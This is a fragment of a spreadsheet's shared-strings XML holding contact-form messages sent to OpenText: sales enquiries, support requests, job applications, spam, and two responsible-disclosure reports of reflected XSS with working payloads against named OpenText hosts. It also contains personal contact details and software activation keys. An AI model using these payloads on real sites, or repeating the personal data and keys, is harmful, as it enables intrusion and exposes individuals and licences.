  </si>
  <si>
    <t>We have been engaged by our client, the MRO organisation within a global airline, to review their current business capabilities and IT architecture. Within our engagement we are preparing a future capability model for the organisation and future technology architecture. We now need to engage the software market to understand the match between the capabilities they will need and what potential software solutions can provide. _x000D_
_x000D_
We request your participation in this capability matching exercise as your responses will help inform our recommendations for the future systems architecture of our client. _x000D_
_x000D_
Please provide an email address through which we can provide greater details.</t>
  </si>
  <si>
    <t>need access to Stage AP portal</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to pay my car payment </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have been researching your company website and following your progress. I figured it would be worth leaving you a note. We specialize in providing B2B Data &amp; Data related services to our valuable clients. Our repository features over 51 Million B2B contacts from a range of industries. With the Launch of Our Contact Builder App, it’s now simpler to reach your target market in a few easy steps. Just a few clicks can help you customize your email list, build your business network &amp; experience unparalleled success. Log on to https://goo.gl/Jq7Ufw &amp; get connected with officials right from C-level decision makers to secretarial officers within your target market.</t>
  </si>
  <si>
    <t>Requesting access to Support to download patches for RightFax server and clients.</t>
  </si>
  <si>
    <t>Requesting Support to download patches for RightFax server and clients.</t>
  </si>
  <si>
    <t>Could you please let me know the contact details of Livelink 9.5._x000D_
We are having issues logging and need quick help.</t>
  </si>
  <si>
    <t xml:space="preserve">We are exploring new DM systems.  We currently use Worldox GX4.  Would appreciate a demo if possible.  This would include myself and the Director of IT.  Thank you. </t>
  </si>
  <si>
    <t>Hi!_x000D_
Yesterday i reported a vulnerability via this contact form, but i haven't recieved any type of confirmation (manually or automatic)._x000D_
Did your guys recieved it sucessfully?_x000D_
_x000D_
Regards_x000D_
_x000D_
--Jose Carlos Exposito Bueno</t>
  </si>
  <si>
    <t>Downloading Content extremely slow.</t>
  </si>
  <si>
    <t>I am sahana. I'm pursuing my engineering from Gitam University Hyderabad. Can you please inform me the off campus drives in Hyderabad</t>
  </si>
  <si>
    <t>Hej Elina och Ann-Catrine,_x000D_
hoppas allt är bra med er!_x000D_
_x000D_
Jag plockar upp Mikaels dialog sedan tidigare för att undersöka vilken kostnad det skulle vara för oss att använda Brava! Reader._x000D_
_x000D_
Vilken information behöver ni av mig för att kunna ge detta?_x000D_
_x000D_
Best regards_x000D_
Henrik Andersson_x000D_
_x000D_
Henrik Andersson_x000D_
System Analyst Autodesk, Product Care, Dexther, CAD Integrations Product Information and Configuration, Corporate IT_x000D_
Mobile: +46 768 95 09 01_x000D_
IM: henrikd.andersson@alfalaval.com_x000D_
Email: henrikd.andersson@alfalaval.com_x000D_
_x000D_
Alfa Laval Lund AB_x000D_
Box 74 - SE-221 00 Lund - Sweden_x000D_
Visit: Rudeboksvägen 1 - SE-226 55 Lund_x000D_
Registration number: 556016-8642 - Registered office: Lund Tel switchboard: +46 46 36 65 00 - Fax switchboard: +46 46 30 50 90 www.alfalaval.com This e-mail is intended solely for the use of the individual or entity to whom it is addressed and its content shall be regarded as confidential unless explicitly stated otherwise. If you have received this e-mail by mistake, please notify the sender immediately by e-mail and delete this e-mail from your system._x000D_
_x000D_
-----Original Message-----_x000D_
From: Mikael Johansson_x000D_
Sent: den 14 september 2017 10:02_x000D_
To: Henrikd Andersson &lt;henrikd.andersson@alfalaval.com&gt;_x000D_
Subject: FW: OpenText - Business Process Management White Paper_x000D_
_x000D_
Hej!_x000D_
_x000D_
Jag hittade inte anteckningarna men jag hittade detta email med 2 kontakter:_x000D_
_x000D_
Elina Sonnerstam &lt;esonners@opentext.com&gt; Ann-Catrine Sollenbring [mailto:asollenb@opentext.com]_x000D_
_x000D_
Best Regards_x000D_
Mikael Johansson_x000D_
_x000D_
_x000D_
_x000D_
Mikael Johansson, Mechanical Engineer_x000D_
PDM/CAD Support, Product Information System (CC) Tel direct: +4646366936 - Mobile: +46709366936 – Home: +4646157258 mikael.johansson@alfalaval.com_x000D_
_x000D_
Alfa Laval Lund AB_x000D_
Box 74 - SE-221 00 Lund - Sweden_x000D_
Visit: Rudeboksvägen 1 - SE-226 55 Lund - Sweden Registration number: 556016-8642 Tel switchboard: +46 46 36 65 00 - Fax switchboard: +46305090 http://www.alfalaval.com - info@alfalaval.com_x000D_
_x000D_
This e-mail is intended solely for the us</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I'm Raffaella Torriero and I've recently obtained my Master of Science in Business Administration in Tor Vergata University based in Rome, with specialization field in Management Consulting. _x000D_
By the fact that I graduated in July, I want to gain as much experience as possible in order to apply my theoretical knowledge studied at university in a practical environment in order to be an active part of the labour market. For that, I've found your company very interesting because my main objective is to work in a competitive environment in order to increase my international experience not only by exploring new ways of doing business but also to show my hard-working skills, my determination and attention to details._x000D_
_x000D_
For what concerns my language skills, I can speak fluently English because I've studied it since I was young (I have a C1 level) and both my Bachelor's degree and my Master's degree had courses and exams completely in English. Italian is my native language but I'm currently studying for Chinese HSK 3 exam certificate; this because I've studied Chinese since my Bachelor's Degree in LUISS Guido Carli University and I've spent four months in China for an exchange program at Shanghai Normal University. I have also few basis of French because I've studied it at middle school for three years and I've started again to practice it last year._x000D_
_x000D_
I'm available immediately and if you give me the opportunity I would like to put my skills at this company's service._x000D_
_x000D_
I hope that you will consider my application and attending news I would like to send my CV._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Raffaella Torriero</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
ARB Coaching (Arts martiaux, Remise en forme et Bien-être) est une structure née de l’envie d’agir à travers le sport._x000D_
Ce concept a pour but de développer une activité sportive et de faire découvrir les bienfaits des arts martiaux aux salariés sur leur lieu de travail._x000D_
_x000D_
ARB Coaching propose des cours de cross combat (méthode d'entraînement unique mêlant des mouvements d'arts martiaux et de fitness afin de faire travailler tous les muscles de manière variée et ludique) et de self défense. _x000D_
_x000D_
Les cours peuvent être délivrés ponctuellement, selon les disponibilités des salariés ou de manière régulière._x000D_
_x000D_
Les séances ont pour objectifs fondamentaux :_x000D_
_x000D_
- Apprendre à maîtriser son stress et sa peur de gérer des situations conflictuelles_x000D_
_x000D_
- Acquérir les bons réflexes de défense dans le cas d’agressions physiques._x000D_
_x000D_
- Améliorer votre condition physique._x000D_
_x000D_
 _x000D_
ARB Coaching – des horaires sur mesure_x000D_
_x000D_
 _x000D_
Si vous souhaitez bénéficier de notre savoir faire, de notre motivation et de nos champs de compétences, n’hésitez pas à nous contacter afin de définir ensemble l’organisation la mieux adaptée, en termes d’horaires, lieu et contenu spécifique._x000D_
_x000D_
Je vous laisse découvrir un aperçu d'une séance en cliquant sur le lien ci dessous :_x000D_
_x000D_
https://youtu.be/nrq6Lxm_2C8_x000D_
_x000D_
 _x000D_
Dans l’attente d’une réponse de votre part, je vous prie d’agréer, mes salutations distinguées._x000D_
_x000D_
_x000D_
_x000D_
Samir Arab_x000D_
ARB Coaching_x000D_
Coach Sportif_x000D_
Tél : +33 6 13 84 33 67_x000D_
Email : samir@arbcoaching.fr_x000D_
www.arbcoaching.fr_x000D_
facebook : arbcoachingfr</t>
  </si>
  <si>
    <t>For Job as Software Developer(Dot Net). so, if you have requirement please contact me..</t>
  </si>
  <si>
    <t>Hello,_x000D_
 _x000D_
I'm a Security Researcher_x000D_
_x000D_
This is a responsible private disclosure of the vulnerability i found on your web site._x000D_
_x000D_
I'm reporting this bug to make your website safe and  provide, secure, robust service to your customers._x000D_
---------------------------------------------------------------------------------------------------------------------------------------------_x000D_
_x000D_
I found a Xss Reflected Vulnerability on your website._x000D_
_x000D_
Path: http://www.opentext.com//training/trainingsearch.html_x000D_
_x000D_
---------------------------------------------------------------------------------------------------------------------------------------------_x000D_
_x000D_
 Select webtop administration in the course name and intercepted the search request._x000D_
_x000D_
In the base request Name parameter is vulnerable to XSS._x000D_
_x000D_
i used  xss pay load  xvitt"&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;i4cq  and the request was echoed on the page._x000D_
_x000D_
_x000D_
---------------------------------------------------------------------------------------------------------------------------------------------_x000D_
_x000D_
Remediation_x000D_
_x000D_
in most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:_x000D_
_x000D_
Input should be validated as strictly as possible on arrival, given the kind of content that it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized._x000D_
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including &lt; &gt; " ' and =, should be replaced with the corresponding HTML entities (&amp;lt; &amp;gt; etc).       _x000D_
----------------------------------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>Download sent to wrong address needs to be resent to Kirsten@bentleyhomes.com.au</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a contacts for the following products:_x000D_
IXOS_OfficeAddIn_x000D_
LiveLink_x000D_
OpenText Imaging Windows Viewer_x000D_
_x000D_
We're launching a program to ensure application compatibility between Office 365 ProPlus and Office (COM/VSTO) add-ins.  _x000D_
_x000D_
We are asking for OpenText's support of O365.  Please let me know your interest in this program.  I'm happy to set up a call to review._x000D_
_x000D_
Thanks,_x000D_
Chau Nguyen_x000D_
Office Marketing </t>
  </si>
  <si>
    <t>I would like to buy Brava Reader to open documents in a CD. Thus, I would like to know how much it costs. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Salutations,_x000D_
_x000D_
I believe you are looking for either append your in-house database or purchase an opt-in email list for drive your marketing channel more effective._x000D_
_x000D_
We recently updated “Banking &amp; Finance Industry Professionals”. To name few titles: C-suites, VP, President, Director, Managers, Head Sales &amp; Marketing, IT/Payments/ Digital/ATM/e-Commerce professionals, etc._x000D_
_x000D_
If anything sparks an interest, please use the customized options to filter your target audience. I will get back to you with counts, few samples and pricing details._x000D_
_x000D_
Target Industry:  ___?___; Geography:  ___?___; Job Title (Any):  ___?___:_x000D_
_x000D_
Thanks you._x000D_
_x000D_
Shawn Christian_x000D_
Inside-Sales Executive_x000D_
shawn.christian@v3dataintel.com_x000D_
We cover - Data Appending; Email Campaign; Company Profiling; List Acquisition._x000D_
</t>
  </si>
  <si>
    <t>Good Afternoon: I am a new administrative user of EDOCS for the City of Austin, Texas. I would like to receive the "OpenText Customer Alerts" for EDOCS, but I do not know how to subscribe to this email list. Thanks.</t>
  </si>
  <si>
    <t>I'm leading our firm's effort to identify and implement a document management system. I'd like to connect with your sales team to learn more about OpenText. Thanks!</t>
  </si>
  <si>
    <t>Please grant Kevin.Eimers@ucdenver.edu My Support access.  Thanks!</t>
  </si>
  <si>
    <t>testing testing</t>
  </si>
  <si>
    <t xml:space="preserve">I am exploring support options for RightFax including an update. We are on version 9.2. We need to move away from the physical Brooktrout card and to a virtual server solution. We receive about 280 faxes a day and I am looking to improve our throughput also. </t>
  </si>
  <si>
    <t>I can not get the trial version to load on my computer, it states it can not contact the licensing host.</t>
  </si>
  <si>
    <t>We are needing the latest functional description and pricing on the MediaBin reporting module.   Our reporting needs have increased lately.   Thank you, David</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
We are still awaiting payment for our refund, please let us know when we will receive the payment? :_x000D_
_x000D_
Invoice Details_x000D_
Customer ID  : 199609_x000D_
Invoice ID : SCCU00029372_x000D_
_x000D_
Regards_x000D_
Revathi  Meyyammai_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am a reseller in Canada and i have a client (GOA Economic Development and Trade) who is interested in Brava Desktop 7.4. Can i get a quote for Brava Desktop 7.4 please?_x000D_
_x000D_
Are there reseller and government pricing for the product?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Edward</t>
  </si>
  <si>
    <t>Please help me with OpenText Exstream Trial Software and its availability for our organization and the resources corresponding to the same.</t>
  </si>
  <si>
    <t>Please provide me the link to download provision for my project</t>
  </si>
  <si>
    <t>I support a customer named Commerzbank that utilizes the Teleform OCR service. They currently use the following website and need it to be https and not http. http://teleform.intranet.commerzbank.com/WebCapture/WCMApp/WCMCapt.aspx  _x000D_
Please contact me so we can work to resolve this issue.</t>
  </si>
  <si>
    <t>LOOKING FOR JOB OPPORTUNITY AS PHP DEVELOPER</t>
  </si>
  <si>
    <t>I am looking to see if there is a splitting tool built within your product</t>
  </si>
  <si>
    <t>Would like to discuss upgrading our current Rightfax 10.5.1 to the latest version. Upgrade procedure and cost. Not sure who our rep is.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking forward to obtaining a fax line through you. I was referred to you by a company that utilizes your services. </t>
  </si>
  <si>
    <t xml:space="preserve">HI OpenText, I need to make William Le (William.Le@ucdenver.edu) an admin for University of Colorado | College of Nursing E-Fax.  Our SUID is as follows: 56345-12314.  </t>
  </si>
  <si>
    <t>Posibilidad de ofrecer el gestor documental documentum</t>
  </si>
  <si>
    <t>We are currently running our EDI software with GXS Application Integrator version 5.  We are looking into an upgrade. Could you please contact me or send me any information. _x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi,  I am trying to locate someone in the Open Text People Center to discuss your solutions to the HR community</t>
  </si>
  <si>
    <t>Hi, I don't seem to have access to support for BMO, I am trying to update a ticket that I opened via the old support.emc.com website but do not seem to have access.</t>
  </si>
  <si>
    <t xml:space="preserve">What is the best way to contact for advertising purposes </t>
  </si>
  <si>
    <t xml:space="preserve">we need to dismiss the actual contract : actuale organization Account is Ingram Micro Italy SRL ; please contact me as soon as possible </t>
  </si>
  <si>
    <t>In the planning phase for our RightFax Upgrade. We want to consider RightFax connect as one of our options. _x000D_
_x000D_
Sherine</t>
  </si>
  <si>
    <t>I can't get into My Support.  I keep sending the confirmation e-mail and get a return e-mail that my access is in place, but when I sign in, I still get the No Access message.</t>
  </si>
  <si>
    <t>The host tatproddel105.tat.cloud.opentext.com is vulnerable to XSS attacks via vgnextlocale parameter as shown on the next proof of concept._x000D_
_x000D_
_x000D_
==PROOF OF CONCEPT ===_x000D_
https://tatproddel105.tat.cloud.opentext.com/v/index.jsp?vgnextoid=59ba3a9899be0510VgnVCM100000164d8d0aRCRD&amp;vgnextfmt=default&amp;vgnextlocale=sv_SE%22%3E%3Csvg/onload=confirm(document.domain)%3E&amp;isMakeEnquiry=false&amp;phone=555-555-0199&amp;pageTitle=Aff%C3%83%C2%A4rslivet+-+BVG+Bedrijfsunits&amp;name=x&amp;isRequestCallback=true&amp;company=x&amp;btnRequestCallback=Be+att+vi+ringer+upp&amp;job=x&amp;contactOid=2621a49adf48f410VgnVCM100000814d8d0aRCRD&amp;email=x_x000D_
_x000D_
=== NOTES ===_x000D_
Let me know when this issue was reviewed by a security staff._x000D_
Feel free to contact me for further information._x000D_
_x000D_
Regards_x000D_
-- Jose Carlos Exposito Bueno</t>
  </si>
  <si>
    <t>To request the course and videos material of Documentum records manager, rps, prm. If possible, also send the demo application created with the help of rm, rps, prm.</t>
  </si>
  <si>
    <t>What is the development framework for your ECM</t>
  </si>
  <si>
    <t>Hi, could you please send me (or give a hint where to find) a compatibilty list (supported operating systems) for SQL Base 12.1? I didn't find this on your website._x000D_
Thanks in advance, kind regards_x000D_
Alexander Rosenberg</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
In our company we are making a software analysis to work with a BPMN tool that can full fil our needs. If possible I ask you to tell me if your tool have the following resources:_x000D_
_x000D_
•	Collaboration HUB/ Portal for end users read process     _x000D_
•	Reports/ Templates  that can be created with the information already in the process_x000D_
•	Workflow Approval   _x000D_
•	Compare Diagrams   _x000D_
•	According OMG 2.0 BPMN   _x000D_
•	Multi Languages       _x000D_
•	KPI´s_x000D_
_x000D_
Best regards,_x000D_
Helena Almeida</t>
  </si>
  <si>
    <t xml:space="preserve">I'm a shoes trader from Agra India and I'm able to produce all kinds of shoes, sandals and boots for children, ladies and men's. _x000D_
_x000D_
I'm looking forward your valuable feedback on this. _x000D_
_x000D_
Thanks &amp; Best Regards _x000D_
Alok Sharma _x000D_
Mob +91 9759221845 </t>
  </si>
  <si>
    <t>We are preparing an offering for a customer that use OpenText and want to integrate with Salesforce. My doubt is about the metadata,  when you upload a file from Salesforce to OpenText, is it possible to define an object with the metadata associated to these file for later search? or the metadata is already defined in the EIM and you just have to fill in from Salesforce?_x000D_
_x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je vous contacte car après plusieurs tentatives de connexion au service de support pour « Open Text Integration Center », nous sommes redirigé vers la page internet suivante : _x000D_
"https://login.opentext.com/connect/sso_controller-profile?sys_action=sso_noperms_kc_css" _x000D_
Sur cette page il est précisé que via notre compte nous n'avons pas accès au service MySupport._x000D_
Pourriez-vous revenir vers moi afin de nous donner la marche à suivre permettant d’ouvrir un ticket incident. _x000D_
En effet, nous avons constaté un fonctionnement anormal de notre outil et souhaiterions pouvoir avoir une retour de votre part sur la problématique rencontrée._x000D_
_x000D_
Merci d’avance pour votre retour._x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Roland LE ROCHELEUIL_x000D_
TMA Infocentre Antargaz_x000D_
Tel : 01 41 25 08 79</t>
  </si>
  <si>
    <t>A bug in macosx FirstClass Client who affect mac computers with many Users. We have 40 users on every mac in our school. _x000D_
The problems have with fcctemp rights to do. If someone who develop macosx FirstClass Client contact me with email so I can explain the problem and help you solve this problem so the next version works perfect. I think it's easy to fix. Have a nice day. Tommy Rönning</t>
  </si>
  <si>
    <t>We are using entrerpise version for Brava (Brava! Enterprise All-in-One SKU: Doc/Image/CAD,Unique #: IGC456392)_x000D_
I am facing an issue with the software.i want to open a support ticket for the issue which our users are facing.please help!!</t>
  </si>
  <si>
    <t>Hej,_x000D_
Jag skulle behöva prata med er ang våra licenser och support på HP Exteam inför nästa år. Vi har precis förnyat vårt avtal ,ed Er, men jag känner att vi behöver snacka lite om vi t.ex är rätt licensierade och om vi uppfyller varandras SLA osv. Kan nån från er i Sverige ta kontakt med mig? Tack!</t>
  </si>
  <si>
    <t>Hi, I am looking for OpenText training for my team. Kindly share price catalogue in INR for the content suite and process suite training. _x000D_
Regards, _x000D_
Krishna.</t>
  </si>
  <si>
    <t>We are looking for an enterprise grade document management system. Let us know if OpenText can assist us for the same. Thanks.</t>
  </si>
  <si>
    <t>Hi Open Text, _x000D_
_x000D_
My name is Dan Chabert, and I contacted you previously to see if you are willing to sell a link or accept sponsored post on your site._x000D_
_x000D_
Please tell me if you are willing to work something out._x000D_
_x000D_
Thanks,_x000D_
Dan Chabert</t>
  </si>
  <si>
    <t>Dear OpenText, we would like to request quotation for OpenText Brava! DWG Viewer and OpenText Brava! Reader. Your immediate reply is very much appreciated. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Ask a question </t>
  </si>
  <si>
    <t>Interested in a product demo of your ECM product(s) and capabilities for integrating them with Ellucian Banner 9.</t>
  </si>
  <si>
    <t xml:space="preserve">Need help with our Right Fax server services keep failing.   </t>
  </si>
  <si>
    <t>Cancel Fax service</t>
  </si>
  <si>
    <t>Hi, in my company we have a license, purchased in 2004, for Hummingbird DM Server 5.1._x000D_
It is possible and lawful to use this license to install OpenText Edocs DM Server 5.3 on windows 2008 and windows 2012. In the DM Server 5.3 installation form, when the license number is required, the one in our possession is valid , is accepted and the installation ends regularly.</t>
  </si>
  <si>
    <t>We are looking for some assistance to deliver some fax blasts to approximately 10,000 recipients over a few months. We at TELUS had used this service twice previously and the last contact was with a Tim Clayson.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
First off, I'd like to say that you have a great website!_x000D_
_x000D_
I wanted to shoot you a quick message, as I work for a California-based animation production studio that creates short, to-the-point videos. _x000D_
_x000D_
Over the last 5+ years, we’ve been producing videos that have been featured on Wistia, RepairShopr, and even walmart.com. One of our most recent videos has received more than 40k views. Watch it here: https://www.sharpeyeanimation.com/shipstation-software/_x000D_
_x000D_
We’re passionate about making great videos that help companies grow, and our mission is to make it easy for businesses like yours to benefit from them._x000D_
_x000D_
Have you considered making a video? If so I am happy to hop on a phone call to discuss. Just let me know when have some time._x000D_
_x000D_
thanks_x000D_
_x000D_
____________________________________x000D_
_x000D_
Chris Abbott | Business Development Manager_x000D_
Sharp Eye Animation | Explain your story_x000D_
_x000D_
Direct: +1 858 414 2528_x000D_
Studio: +1 800 535 9831 _x000D_
265 Cambridge Ave, Palo Alto, CA, 94309_x000D_
_x000D_
chris@sharpeyeanimation.com_x000D_
https://www.sharpeyeanimation.com</t>
  </si>
  <si>
    <t>Looking for solution that can handle large organization with Foip faxing capabilities over 200 users.Need to know my option about fax, replication of fax server etc.</t>
  </si>
  <si>
    <t>I Need my username and password, we used to have GXS before can you please provide this info.</t>
  </si>
  <si>
    <t>I need help from professional service to built record management functionality in our application</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am trying to find out who would be the right person to contact about marketing events. </t>
  </si>
  <si>
    <t>Looking for information on Exstream</t>
  </si>
  <si>
    <t>Unable to fax correspondence through my email. Never get a confirmation of an email.</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to see if you would be interested in having access to Oracle EBS &amp; Peoplesoft users for your upcoming marketing/event promotions._x000D_
_x000D_
Each contact comes with complete information like Verified Email Address, Phone Number, Social Media Link and more vital information._x000D_
_x000D_
We can also help you with the users of:_x000D_
_x000D_
•	MS Dynamics GP, NAV_x000D_
•	Infor ERP_x000D_
•	Epicor ERP_x000D_
•	SAP ERP_x000D_
•	Netsuite ERP_x000D_
•	Sage Intacct &amp; more.._x000D_
_x000D_
Please let me know if you have any other requirements (if any) apart from above mentioned and I shall get back to you with more relevant information. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Setup my access for desktop fax</t>
  </si>
  <si>
    <t>Hi, we are a virtual pharmaceutical company and would like to learn more about your Part 11 compliant eQMS solutions, including modules offered and rough pricing schemes. Can you please send an information package or set up a call so we can quickly begin this introductory process? Many thanks for your help and time.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I registred my OpenText Connect account due to an error._x000D_
I want to unsubscribe but I can't find the way to do it._x000D_
Please, could you tell me now?_x000D_
Thanks in advance._x000D_
_x000D_
Luca</t>
  </si>
  <si>
    <t>Trying to get TECHNICAL assistance with D2 product. We have a maintenance support contract with opentext. Please advise how to contact technical support. Thank you</t>
  </si>
  <si>
    <t>URGENT:  Need to talk to Sales &amp; Support about a FirstClass Archive Server.  We need to buy support for it.  It is running and working, but we'd like to adjust it.  Please contact me as soon as possible.  Thank you!!  ~Jonathan Becker</t>
  </si>
  <si>
    <t>Hello, I want to know if Open Text works with .Net application or if there are any version that works with .Net Application. We want to use it as component in one application is that possible with Open text version 15._x000D_
Please let me know</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
We require an installation package for Gupta Report Builder. We are previous customers of this software but no longer have the original installation package. For reference:_x000D_
_x000D_
Product Media Code: 7E08FA52-4295F120-D8C202C7-015725E5_x000D_
Product Activation Code: A32F9CA4-F0B281B5-1E17624A-69F82E82_x000D_
_x000D_
Product Name: Report Builder_x000D_
Product Version: 6.2.00_x000D_
_x000D_
Please use the following Product Activation Key (PAK) to activate your Gupta software:_x000D_
Product Activation Key: 8DD02C4DB93CDCC826CF0271715CCEF6_x000D_
</t>
  </si>
  <si>
    <t>We are looking for a fax solution to get rid of our fax machines.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
mit einer sich ändernden ERP Welt wollen wir die Prozesse der Digitalisierung von papierhaften Belegen, Rechnungseingangsmanagement, Verträgen, Ausgangsrechnungen und auch Archivierung mit in Angriff nehmen._x000D_
Ebenso sollten auch Freigabemechanismen und interne Workflows abbildbar sein._x000D_
_x000D_
Daher möchten wir uns gerne ihre Software anschauen, um uns überzeugen zu lassen, dass bei Ihnen all dies möglich ist._x000D_
_x000D_
Vielen Dank vorab._x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Eric Steffen</t>
  </si>
  <si>
    <t xml:space="preserve">I need a copy of my 2016 dividend statement for taxes. </t>
  </si>
  <si>
    <t>May I kindly  know if there  are any available  vacancies  at Bayport  and the email address  that I can  use for  job application.  Thank you</t>
  </si>
  <si>
    <t>Downloading Brava for TRIRIGA</t>
  </si>
  <si>
    <t>Dears,_x000D_
I can't download file from library. It is "error downloading"  after few minutes from start. It's also doesn't work for external people (share the link - the same error).</t>
  </si>
  <si>
    <t xml:space="preserve">we have issue with licence key , we are unable to install brava desk top._x000D_
_x000D_
+971-567957492_x000D_
</t>
  </si>
  <si>
    <t>Corporate Social Responsibility:_x000D_
Hello,_x000D_
I'm interested in getting in touch with whoever is responsible for OpenText's CSR initiatives. I see Mark Morley's name come up but only from documents dating back a couple of years. Is he still involved with that?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I am having trouble sending faxes. We have RightFax Express 2.7. I have tried to configure it but nothing seems to work. </t>
  </si>
  <si>
    <t>I would like to know learning courses / training path on the Opentext Magellan product. Best regards Massimiliano</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Will this course also adress how the connect existing eXstream product engine to the communication server ?_x000D_
_x000D_
Regards Ola Osterberg</t>
  </si>
  <si>
    <t>I am unable to register for the Documentum Certification. Registration for Documentum D7 Consultant is leading to a blank page.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm interested in attending the BIRT Report Training course (3day) commencing on the 21st - 23rd Oct and wanted to check if there is still spaces available._x000D_
Kind Regards,_x000D_
Michael</t>
  </si>
  <si>
    <t>To get support for Metastorm BPM. We have software maintenance but I am unable to register as none of my colleagues know our "_x000D_
System ID/Serial Number/PIN/VPS". The company was previously called Northgate Managed Services and we are providing support for Hartlepool Borough Council. My Colleague "dave.black@northgate-is.com" had access to logon but can no longer long on or reset his password as his email address has changed.</t>
  </si>
  <si>
    <t xml:space="preserve">Actuate e.Reporting Suite :_x000D_
_x000D_
Hello Team,_x000D_
We had a few queries WRT  Actuate e.Reporting Suite application and have made a list of them below._x000D_
1.      Is JAVA embedded in the application?_x000D_
2.      Is JAVA embedded in all the versions of application?_x000D_
3.      If JAVA is not embedded in all versions, which are all the versions they are embedded on?_x000D_
4.      What is the minimum JAVA version that needs to be installed for the application to function?_x000D_
5.      What are all the current JAVA versions that are currently supported by the application?_x000D_
Request you to assist with these queries and also let me know if further information is required from my end._x000D_
_x000D_
Regards_x000D_
_x000D_
Yogesh M_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam _x000D_
_x000D_
I work at the Financial Ombudsman Service and oversee our handling of freedom of information and subject access requests. We’re currently exploring whether we want to change from manual redaction to using an electronic redaction tool so we’d like to understand more about the cost involved in purchasing/using Open Text redaction software. _x000D_
_x000D_
I’d be grateful if you could send me a list of your pricing information and some more information about how the software works. _x000D_
_x000D_
Please don’t hesitate to contact me with any questions. _x000D_
_x000D_
Kind regards _x000D_
_x000D_
Louise Smith _x000D_
</t>
  </si>
  <si>
    <t>Someone with the phone number (800)396-9402 has been calling my private residence at 2am, 3am and 4am and it's coming through as a fax, now, when I called the number back, it gives me a message to go to www.open text.com/block. When I did this, your page came up but I noticed the number from the calls I've been receiving, do not match any of the numbers on your web page?? Could you please check your numbers and see if the number I gave you above in this email is intact one of your numbers so the phone calls can end please?? I'm bordering between fed-up and angry about being woke up 4 and 5 times in the middle of the night!!!! If this "is not" one of your numbers then I apologize for contacting you in a hasty and rude many. Please e-mail me and let me know that this "is not" you so I can seek legal action against the party responsible. Thank You for your time and attention to this matter! The number this person(s) is calling is (304)372-7663.</t>
  </si>
  <si>
    <t>product enquiry of Vendor invoice management</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in text analytics tools, particularly with sentiment analysis capability. </t>
  </si>
  <si>
    <t>Live link</t>
  </si>
  <si>
    <t xml:space="preserve">Currently use Alchemy application and need to follow up on support and maintenance and potential upgrade as we are currently using:_x000D_
Alchemy Server_x000D_
Captaris, Inc._x000D_
Version: 8.3 (Build 600.213)_x000D_
</t>
  </si>
  <si>
    <t>I'm currently getting setup to become a supplier for Walmart and plan to use their WebED. I need software and hardware for EDIINT (AS2) communication as well as EDI translation. Please provide a price quote and let me know if you need additional info.</t>
  </si>
  <si>
    <t>I would like to follow up on my application.</t>
  </si>
  <si>
    <t>Clarification of supported windows operating systems for Documentum 7.2 &amp; 7.3 when using Oracle 11.2 database. We are upgrading but validating what we have been told by our support vendor. It doesn't seem right.</t>
  </si>
  <si>
    <t>Setup was unable contact the license server._x000D_
(Choose license Request Evaluation License- Windows 7 Sp1 64bit)</t>
  </si>
  <si>
    <t>I am looking for the latest version of NFSSolo for Aerojet/Rocektdyne.</t>
  </si>
  <si>
    <t>Can you provide pricing for a replacement LIVELINK solution for one server?</t>
  </si>
  <si>
    <t>Would like to receive information about setting up a document management cloud based system for office. We are a total of 3 users at the moment but may grow in a short space of time.</t>
  </si>
  <si>
    <t xml:space="preserve">We did not receive the invoice._x000D_
we want to update licenses BizLink_x000D_
BizLink version 3.1.0.165_x000D_
Licensed to KUMHO TIRE USA INC_x000D_
Licensed purpose is for Production_x000D_
Licensed for 1 Server Owners (1 currently in use)_x000D_
Licensed for 10 External Trading Partners (10 currently in use)_x000D_
Licensed for 0 Exchange Parties (0 currently in use)_x000D_
Licensed for Unlimited Transformation Parties (34 currently in use)_x000D_
License valid until Tue Oct 03 17:00:00 PDT 2017_x000D_
_x000D_
_x000D_
Customer Number : US01-350284_x000D_
_x000D_
Contract #: USSC-29021-10_x000D_
_x000D_
PSN 600001261_x000D_
_x000D_
PSN : Maint Transform Svcs BizLink : Bizlink_x000D_
PSN : Maintenance BizLink 10TP : BizLink_x000D_
_x000D_
_x000D_
Please update : Bill to  Address_x000D_
KUMHO TIRE USA INC_x000D_
ATTN : MIS DEPT_x000D_
133 Peachtree Street N.E. Suite 2800_x000D_
Atlanta, Georgia 30303_x000D_
Office : (678) 916-3246_x000D_
</t>
  </si>
  <si>
